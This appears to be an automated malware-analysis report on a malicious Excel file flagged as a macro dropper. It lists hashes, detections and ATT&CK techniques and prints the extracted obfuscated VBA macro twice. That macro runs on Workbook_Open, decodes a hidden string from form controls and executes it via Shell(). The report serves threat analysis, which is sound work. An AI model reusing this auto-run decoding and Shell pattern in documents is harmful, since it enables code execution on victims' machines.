Office (OLE) malware analysis — malicious · 2f00e0bb89d863ee

MALICIOUS

Office (OLE)

57.5 KB Created: 2019-01-28 14:28:24 Authoring application: Microsoft Excel Online First seen: 2019-05-16

MD5: bdc928e2064faf3950aef955c1c9fa8c SHA-1: 9f9d41aabb5e58d765f5ff4d930e6dab5fa2a613 SHA-256: 2f00e0bb89d863ee7834ae9cb69d98f8e826e6d328fcdd833d91d62634f675ce

180 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample is an Excel document containing VBA macros, specifically a Workbook_Open macro that calls the Shell() function. This indicates an attempt to execute arbitrary code. The document body contains a lure suggesting the user enable editing and content, which is a common social engineering tactic for macro-enabled malicious documents. The ClamAV detection name 'Doc.Dropper.Agent-6847589-0' further supports its nature as a dropper.

Heuristics 4

ClamAV: Doc.Dropper.Agent-6847589-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6847589-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3443 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3443 bytes
SHA-256: `8950ec06a5ed5ac0189f8374dd1489ba8cb03334d2c2328898750d765d7165c6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub Workbook_Open() ExecuteMain End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Form1" Attribute VB_Base = "0{A1977BFD-6F3F-4AFB-92DE-8E81EFB7600A}{E02E71D8-71BD-420B-B9F7-8AA120AC36C8}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton2_Click() FormatText End Sub Private Sub infor_Change() Dim hy As Integer hy = Len(Form1.infor.Text) If hy < 765 Then ChangeText Form1.infor.Text End If End Sub Private Sub EditSum_Change() End Sub Private Sub TextBox1_Change() Dim i As Integer For i = 0 To 21300 Form1.TextBox1.MaxLength = i Next i End Sub Private Sub CompareTextReals_Click() End Sub Attribute VB_Name = "Module1" Dim ClearText As String Dim ColNum As Integer Dim stripText As String Sub Document_create() CountSym = 1 'Dim level As String With Form1 DT = "" RenameText CountSym, DT, .TextReal ClearText = DT DT = "" CountSym = 1 'Chars_Replace Form1.TextReal, level RenameText CountSym, DT, .Label1 stripText = DT End With MaxNumber (0) End Sub Sub morningDw(Ar1, ByRef Ar2) Ar2 = 0 a0 = 1 LongMul a0, Ar2, Ar1 End Sub Sub FormatText() DD = 141 Document_create End Sub Sub MaxNumber(qw) Dim ln As Integer Dim ris As Double With Form1 ln = Len(ClearText) + Len(stripText) Panda = "dvfert36tge4tgf" 'Shemf Text, si - 2400 - 16 If ln = 320 Then 'MsgBox (ClearText) If 0 = qw Then s1 = "1" s2 = "2" For j = 0 To 240 .TextBox1 = s1 .TextBox1 = s2 Next j .infor = ClearText + .Label2.Caption + stripText '.EditSum = res End If For j = 0 To 170 .TextBox1 = s2 Next j End If 'Form1.Show End With End Sub Sub LockWideString(pointer, ByRef r1) Dim N1 As Integer N1 = 1 If pointer < N1 Then r1 = Right(Left(Form1.EditSum, Len(Form1.EditSum) + pointer), N1) Else r1 = Right(Left(Form1.EditSum, pointer), N1) End If End Sub Sub ChangeText(data1) m = Len(data1) If m > 760 Then Shell data1, m * zer End Sub Sub RenameText(ByRef CountSym, ByRef Build, FET) Dim n As Integer 'LockWideString imemo - 2, st n = Len(FET) If CountSym <= n Then 'Sheet2.Cells(CountSym, 1) = ch ch1 = Left(FET, CountSym) imemo = 1 ch = Right(ch1, 1) morningDw ch, imemo st = "" LockWideString imemo - 6, st CountSym = CountSym + 1 Build = Build + st RenameText CountSym, Build, FET End If End Sub Sub ExecuteMain() Document_create End Sub Sub LongMul(ByRef b1, ByRef control, ACIT) div = div + 1 If b1 <= Len(Form1.EditSum) Then 'Sheet1.Cells(ColNum, b1 + 2 + 3) = b b = Right(Left(Form1.EditSum, b1), 1) If ACIT <> b Then b1 = b1 + 1 LongMul b1, control, ACIT Else control = b1 ColNum = 1 + ColNum End If End If End Sub

SHA-256: 8950ec06a5ed5ac0189f8374dd1489ba8cb03334d2c2328898750d765d7165c6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()

ExecuteMain
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Form1"
Attribute VB_Base = "0{A1977BFD-6F3F-4AFB-92DE-8E81EFB7600A}{E02E71D8-71BD-420B-B9F7-8AA120AC36C8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub CommandButton2_Click()
FormatText
End Sub

Private Sub infor_Change()
Dim hy As Integer
hy = Len(Form1.infor.Text)
If hy < 765 Then
ChangeText Form1.infor.Text
End If
End Sub

Private Sub EditSum_Change()

End Sub

Private Sub TextBox1_Change()
Dim i As Integer
For i = 0 To 21300
Form1.TextBox1.MaxLength = i
Next i
End Sub

Private Sub CompareTextReals_Click()

End Sub





Attribute VB_Name = "Module1"

Dim ClearText As String

Dim ColNum As Integer
Dim stripText As String

Sub Document_create()
CountSym = 1
'Dim level As String
With Form1
DT = ""
RenameText CountSym, DT, .TextReal
ClearText = DT
DT = ""
CountSym = 1
'Chars_Replace Form1.TextReal, level
RenameText CountSym, DT, .Label1
stripText = DT
End With
MaxNumber (0)
End Sub

Sub morningDw(Ar1, ByRef Ar2)
Ar2 = 0
a0 = 1
LongMul a0, Ar2, Ar1
End Sub

Sub FormatText()
DD = 141
Document_create
End Sub

Sub MaxNumber(qw)
Dim ln As Integer
Dim ris As Double
With Form1
ln = Len(ClearText) + Len(stripText)
Panda = "dvfert36tge4tgf"
'Shemf Text, si - 2400 - 16
If ln = 320 Then
'MsgBox (ClearText)
If 0 = qw Then
s1 = "1"
s2 = "2"
For j = 0 To 240
.TextBox1 = s1
.TextBox1 = s2
Next j
.infor = ClearText + .Label2.Caption + stripText
'.EditSum = res
End If
For j = 0 To 170
.TextBox1 = s2
Next j
End If
'Form1.Show
End With
End Sub

Sub LockWideString(pointer, ByRef r1)
Dim N1 As Integer
N1 = 1
If pointer < N1 Then
r1 = Right(Left(Form1.EditSum, Len(Form1.EditSum) + pointer), N1)
Else
r1 = Right(Left(Form1.EditSum, pointer), N1)
End If
End Sub

Sub ChangeText(data1)
m = Len(data1)
If m > 760 Then Shell data1, m * zer
End Sub

Sub RenameText(ByRef CountSym, ByRef Build, FET)
Dim n As Integer
'LockWideString imemo - 2, st
n = Len(FET)
If CountSym <= n Then
'Sheet2.Cells(CountSym, 1) = ch
ch1 = Left(FET, CountSym)
imemo = 1
ch = Right(ch1, 1)
morningDw ch, imemo
st = ""
LockWideString imemo - 6, st
CountSym = CountSym + 1
Build = Build + st
RenameText CountSym, Build, FET
End If
End Sub

Sub ExecuteMain()
Document_create
End Sub

Sub LongMul(ByRef b1, ByRef control, ACIT)
div = div + 1
If b1 <= Len(Form1.EditSum) Then
'Sheet1.Cells(ColNum, b1 + 2 + 3) = b
b = Right(Left(Form1.EditSum, b1), 1)
If ACIT <> b Then
b1 = b1 + 1
LongMul b1, control, ACIT
Else
control = b1
ColNum = 1 + ColNum
End If
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.